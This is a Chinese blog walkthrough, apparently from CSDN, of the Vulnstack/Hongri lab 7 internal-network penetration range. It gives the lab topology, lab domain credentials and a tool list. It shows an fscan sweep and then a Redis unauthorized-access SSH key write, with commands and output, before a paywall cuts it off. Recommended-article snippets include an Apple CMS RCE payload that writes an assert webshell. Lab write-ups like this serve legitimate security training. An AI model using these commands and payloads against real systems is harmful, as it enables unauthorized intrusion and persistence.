极品靶场,多种玩法【实战】红日靶场七:内网综合渗透

最新推荐文章于 2025-09-05 11:07:56 发布
原创 最新推荐文章于 2025-09-05 11:07:56 发布 · 1.4k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#综合渗透 #红日靶场 #web安全 #攻防 #内网穿透 #代理

作者:Eason_LYC
悲观者预言失败,十言九中。 乐观者创造奇迹,一次即可。
一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!
技术领域:WEB安全、网络攻防
关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!
个人社区:极乐世界-技术至上
追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)

1. 靶场环境&内网拓扑

请添加图片描述

1.1 已知信息

攻击机:
  1. kali: 192.168.16.9 kail/kali
  2. win10攻击机(有全套工具):192.168.16.11 anti/anti@2022.asd
  3. 也可使用本地环境作为攻击机(连VPN)

仅知目标系统外网可访问网段为192.168.16.0/24

1.2 目标

1. 攻下右下角DC那台内网机器。

提示信息(正常渗透前不知,方便部署环境使用)

web7_oa 域账号 whoamianony.org\bunny 密码是 Bunny2021

域内账户

Administratir/Whoami2021 bunny/Bunny2021

攻击思路有两条

  1. 攻击机 ==》web1 ==》win7 ==》win7_pc2 ==》 DC
  2. 攻击机 ==》 web1(不能拿拿下时) ==》web2(攻击拿下) ==>再反向拿下web1和后续机器

2.本靶场使用到的工具

  • fscan
  • 哥斯拉v2.9.rar
  • iox.rar
  • laravel-CVE-2021-3129
  • 通达OA漏洞利用工具
  • KSMB.zip
  • mimikatz_trunk.zip

3. 内网渗透

3.1 【web1】渗透web1(192.168.16.148:81,内网ip192.168.52.10)

使用fscan扫描 ./fscan_amd64 -h 192.168.16.0/24 -o 192_168_16_result.txt 信息收集。可知第一个目标web1主机为192.168.16.148

漏洞一个是redis未授权访问,一个是laravel-cve-2021-3129。两种方法推荐redis的方式攻击,成功后直接为root权限,且攻击方便。

[*] Icmp alive hosts len is: 33
192.168.16.9:22 open
192.168.16.148:80 open
192.168.16.148:22 open
192.168.16.148:81 open
192.168.16.148:6379 open
[*] alive ports len is: 5
start vulscan
[+] Redis:192.168.16.148:6379 unauthorized file:/root/dump.rdb
[*] WebTitle: http://192.168.16.148:81  code:200 len:17474  title:Laravel
[+] InfoScan:http://192.168.16.148:81  [Laravel] 
[+] Redis:192.168.16.148:6379 like can write /root/.ssh/
[+] Redis:192.168.16.148:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.16.148     code:502 len:584    title:502 Bad Gateway
[+] http://192.168.16.148:81 poc-yaml-laravel-cve-2021-3129

3.1.1 redis未授权访问(上传公钥方式)

方法一:使用fscan工具直接完成公钥上传./fscan_amd64 -m redis -h 192.168.16.148 -rf /root/.ssh/id_rsa.pub 

┌──(root㉿kali)-[/usr/share/github/fscan]
└─# ./fscan_amd64 -m redis -h 192.168.16.148 -rf /root/.ssh/id_rsa.pub 

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
-m  redis  start scan the port: 6379
start infoscan
(icmp) Target 192.168.16.148  is alive
[*] Icmp alive hosts len is: 1
192.168.16.148:6379 open
[*] alive ports len is: 1
start vulscan
[+] Redis:192.168.16.148:6379 unauthorized file:/root/dump.rdb
[+] Redis:192.168.16.148:6379 like can write /root/.ssh/
[+] 192.168.16.148:6379 SSH public key was written successfully
[+]</
最低0.47元/天 解锁文章
红日靶场)vulnstack7
sagic的博客
04-07 3303
自学网络安全,学习靶场渗透
记录渗透靶场实战【网络安全
热门推荐
kali_Ma的博客
11-06 2万+
第一次写靶场实战的文章,有不足之处还请多多指教。本次实战靶场红日安全vulnstack系列的第二个靶场靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 环境搭建 网络环境 网卡配置 只需要在VM上选择对应网卡即可,不需要在靶机中进行配置。 DC IP:10.10.10.10 (VMnet5) OS:Windows 2012(x64) WEB IP1:192.168.111.80 (VMnet6) IP2:10.10.10.80 (VM
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 8547
内网渗透-实战|手把手教你如何进行内网渗透
红日靶场教程,不看后悔!
weixin_45885440的博客
10-11 2799
主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习
红日安全att&ck靶场7 内网靶场 WP
trytowritecode的博客
04-11 7949
记一次中型靶场getshell全过程,难度适中,很有意思 这里用kali来模拟外网攻击机,其实用自己服务器也完全ok 个人认为,此方法比官方wp要好懂一些 首先是靶场地址 靶场 先看拓扑图因为环境要提前配置,这里的192.168.1.0/24的这个网段根据自己的虚拟机环境来改不一定说一定要和官方拓扑一模一样,就像我自己就是192.168.16.0/24 看下图 然后开始配置环境,网卡这里官方已经处理的差不多了,大概是能测试ping通就行 然后启动服务这里全按官方说明来配置 这里注意了很重要不然你后面打靶
内网渗透总结(红日靶场一)
未完成的歌~的博客
04-11 1万+
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_86951299的博客
09-12 1583
1、先判断是否存在域,使用查看 DNS 服务器,发现主 DNS 后缀不为空,存在域god.org,如下图所示:或者也可以执行命令来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息:2、上面发现 DNS 服务器名为 god.org,当前登录域为 GOD,那接下来可执行查看有几个域(域环境可能存在多个域):3、既然只有一个域,那就利用命令查看域控制器主机名,直接确认域控主机的名称为 OWA:4、已经确认域控主机的名称为 OWA,继续执行命名net view。
内网渗透---红日靶场1
qq_73212565的博客
09-18 1147
官方下载地址及相关信息:​​​下载后有三台虚拟机,默认密码为:win7 IP:192.168.50.210(外网)192.168.52.143(内)win2008 192.168.52.138(内)win2003 192.168.52.141(内)kali 192.168.50.218(攻击机)靶场环境搭建完毕。
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-优快云博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-优快云博客.html
ATT&CK靶场系列(
qq_1873822的博客
12-04 8032
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192.168.93.1/24 按着上面的图片把相关的ip段给配置就行 DMZ区域: 给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。 第二层网络区域: 给U
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4191
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
渗透测试-漏洞靶机
weixin_46162146的博客
01-15 5583
0X01 sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs 0X02 xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:http://xss-quiz.int21h...
红日vulnstack7全操作
weixin_62334252的博客
06-22 9996
http://vulnstack.qiyuanxuetang.net/vuln/detail/9/整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。 域用户账户和密码如下: Administrator:Whoami2021 whoami:Whoami2021 bunny:Bunny2021 moretz:Moretz2021Ubuntu 1: webweb2021Ubuntu 2: ubuntu
linux内网-cfs2
灰太的表格的博客
02-04 1391
linux内网-cfs2 苹果cms: 有个rce的洞: getshell payload(a): index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A} fput写马,test.php 密码test: index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHA
零基础渗透测试全程记录(打靶)——w1r3s
ranzi.
01-09 1070
文章介绍了渗透测试流程及打靶实例。渗透流程含确定目标、信息收集、发现漏洞、漏洞利用、权限提升与权限维持等环节。打靶实例中,先是准备阶段启动靶机和kali并调好网络模式,然后通过多种方法收集信息,如确认靶机IP、不同类型的扫描等。还对各端口进行漏洞探测,像21端口的FTP操作、80端口的相关利用等,之后进行漏洞利用、权限提升操作,最后在root目录下找到flag.txt获取flag,整个过程完整呈现了渗透打靶的具体操作与各阶段情况。
【网络安全】带你打穿三层内网-红日靶场
Yb528970805的博客
09-14 569
注意我们已经将kali的6667和vps的6667关联,所以其实web1的6667最终流量会到达kali,注意监听器需要设置为web1的内网ip,通过http连接。通过win7(pc1)横向渗透,抓取hash和明文可以抓取到域内用户bunny的密码值,上传fscan对93c段进行扫描。反弹shell,这里需要将kali的监听端口转发到web1上,然后让web2来连接web1。拿到web2的system权限,由于是windows,,所以上线cs操作。上线为www权限,还在docker中,考虑提权再逃逸。
学黑客技术必看的四个靶场练习平台!!练手不踩坑
最新发布
logic1001的博客
09-05 503
想学黑客技术又怕踩坑?怕不小心踩了法律红线?别慌!今天给大家安利四个平台,新手老手都可以放心大胆的练习技术。这是一个非常适合小白练习的靶场,不仅有从易到难的靶场实战习题,还覆盖主流漏洞类型,掌握完大部分的主流漏洞后,去挖一些简单漏洞还是可以的。:能提供真实的攻防对抗场景,有效提升安全管理和安全运维人员的实战经验;演习全流程安全可控可追溯,采用 VPN 接入、攻击流量留存等手段保证安全;性能成熟稳定,可同时支持多场上千人规模的攻防演习,还具有独有的可视化功能,能直观反映出攻守双方的实时攻防状态等。
红日内网渗透靶场搭建
02-21
### 构建红队内网渗透测试靶场环境 #### 选择合适的虚拟化平台 为了构建一个安全可控的实验环境,建议使用 VMware Workstation 或 VirtualBox 这样的桌面级虚拟化软件来创建多个虚拟机实例。这些工具允许灵活配置网络模式并支持快照功能以便快速恢复初始状态[^2]。 #### 设计合理的网络拓扑结构 通常会模拟企业内部常见的分层架构,包括但不限于 DMZ 区域、办公区以及核心服务区等不同逻辑分区。通过设置不同的子网划分各个区域,并利用路由器连接起来形成完整的局域网体系。 #### 部署典型的服务端应用 安装 Windows Server 和 Linux 发行版作为服务器操作系统,在其上架设 Web 应用程序(如 IIS/Apache)、数据库管理系统(MySQL/SQLServer)以及其他可能成为攻击目标的企业级服务组件。确保版本老旧存在已知漏洞以增加实战训练价值。 #### 搭建必要的客户端设备 除了上述提到的服务端节点外,还需要准备若干台运行着日常业务操作系统的客户终端,比如 Windows 7/10 工作站或是 Mac OS X 笔记本电脑。它们可以用来发起恶意流量或者充当被控制主机的角色参与演练过程。 #### 安全防护措施部署 尽管这是一个受控环境中进行的安全研究活动,但仍需遵循最小权限原则仅授予必要访问权给参与者;同时开启防火墙规则限制外部未授权接入尝试;定期备份重要数据文件以防意外丢失造成不可挽回损失。 ```bash # 创建一个新的虚拟网络接口用于隔离测试环境 vboxmanage hostonlyif create # 设置静态IP地址范围供后续分配给各VM使用 vboxmanage dhcpserver add --netname HostInterfaceOnlyNetwork \ --ip 192.168.56.1 --netmask 255.255.255.0 --lowerip 192.168.56.100 \ --upperip 192.168.56.200 --enable ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eason_LYC

坚持下去,谢谢你的鼓励!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值